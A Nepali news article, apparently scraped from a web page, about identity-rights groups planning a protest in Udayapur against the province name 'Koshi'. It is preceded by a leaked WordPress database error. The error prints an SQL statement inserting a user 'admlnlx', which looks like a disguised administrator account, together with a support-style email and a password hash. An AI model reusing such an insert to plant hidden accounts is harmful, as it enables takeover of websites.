WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BBKJHEQySF6TU1MRR3iZ89lWksknqZ.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 05:47:11', '', 'admlnlx', 'admlnlx')
काठमाडौ । प्रदेशको नाम ‘कोशी’ विरुद्ध आन्दोलनरत पहिचानवादी पक्षधरले उदयपुरको पश्चिमी भेग घुर्मी बजारमा पर्सि १४ गते विरोध कार्यक्रम गर्ने भएका छन् ।
प्रदेशको नाम ‘कोशी’ राखिएपछि दबाबमूलक आन्दोलन गर्दै आएको प्रदेश नं.१ पुनः नामाङ्कन संयुक्त संघर्ष समितिको आयोजनामा विरोध कार्यक्रमको आयोजना गरिएको हो ।
प्रदेशको नाम ‘कोशी’ खारेजी गरी पहिचानको आधारमा नाम राख्न माग गर्दै १० महिनादेखि पहिचान पक्षधरले दबाबमूलक आन्दोलन गर्दै आएका छन् ।
पश्चिमी भेगको उदयपुरको घुर्मी बजारदेखी पूर्वमा चिवाभञ्ज्याङसम्म पहिचान जागरण अभियान सञ्चालन गरिने संघर्ष समितिले जनाएको छ ।
विरोध कार्यक्रमलाई प्रदेश १ पुनः नामाङ्कन संघर्ष समितिका अध्यक्ष डकेन्द्रसिं थेगिम, किरात राई यायोक्खाका संघीय अध्यक्ष जीवन हाताचो राई, किरात याक्थुङका संघीय अध्यक्ष प्रेम येकन, पूर्व मन्त्री गोपाल किराती लगायत अन्य आदिवासी जनजाति सामाजिक संघ/संस्था र राजनितिक दलका प्रतिनिधिहरुले कार्यक्रमलाई सम्वोधन गर्ने जनाइएको छ ।
मंशिर १४ गते घुर्मी बजारमा जुटौं, पहिचान विरोधी प्रदेश १ का ८२ जना सांसदहरु र पहिचानको आन्दोलन विरुद्ध बाल्ने नेताहरुलाई गाउँ प्रवेश पहिचानवादी संघर्ष तेज पारौं, भन्ने अभियानकोको सुरुवाती भएको आयोजकले जनाएको छ ।